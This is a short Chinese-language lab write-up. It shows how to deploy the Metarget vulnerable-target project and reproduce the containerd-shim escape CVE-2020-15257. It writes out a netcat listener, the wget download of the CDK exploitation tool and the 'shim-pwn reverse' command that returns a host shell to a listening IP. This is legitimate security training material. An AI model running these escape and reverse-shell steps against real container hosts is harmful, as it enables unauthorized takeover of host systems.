Metarget的實踐(一)
Metarget是一個開源的容器安全靶機項目,經過驗證很方便搭建模擬靶機環境,如下是驗證記錄,
使用ubuntu18.04,下載項目源碼,
git clone https://github.com/Metarget/metarget.git,
安裝pip3,sudo apt install python3-pip,
安裝環境軟件,cd metarget,pip3 install -r requirements.txt,
接著就可以創建自己需要的靶機了,
以cve-2020-15257為例,參考鏈接,
https://github.com/Metarget/metarget/tree/master/writeups_cnv/docker-containerd-cve-2020-15257,
安裝,./metarget cnv install cve-2020-15257,發現抱錯,
加個參數,看看問題是啥,
./metarget cnv install cve-2020-15257 --verbose,
原來是權限問題,需要給root權限,重新來過,
sudo ./metarget cnv install cve-2020-15257,
等一會兒就安裝成功了,接著做攻擊實驗,
拉起一個靶機容器,
sudo docker run -it --net=host --name=15257 ubuntu /bin/bash,
可以查看不安全套接字,cat /proc/net/unix|grep -a "containerd-shim",
還是攻擊更能看效果,先給容器靶機安裝個netcat,
apt update,apt install netcat,開啟個端口監聽,nc -lnvp 1234,
回到宿主機,下載漏洞利用軟件,CDK,
wget https://github.com/cdk-team/CDK/releases/download/v1.0.4/cdk_linux_amd64,
把CDK拷貝到靶機容器,sudo docker cp cdk_linux_amd64 15257:/tmp,
再次進入靶機容器,sudo docker exec -it 15257 bash,
修改CDK文件的權限,cd /tmp,chmod +x cdk_linux_amd64,
執行CDK,進行漏洞利用,開始逃逸,
./cdk_linux_amd64 run shim-pwn reverse 10.90.11.162 1234,
端口監聽那邊就拿到宿主機的shell了,
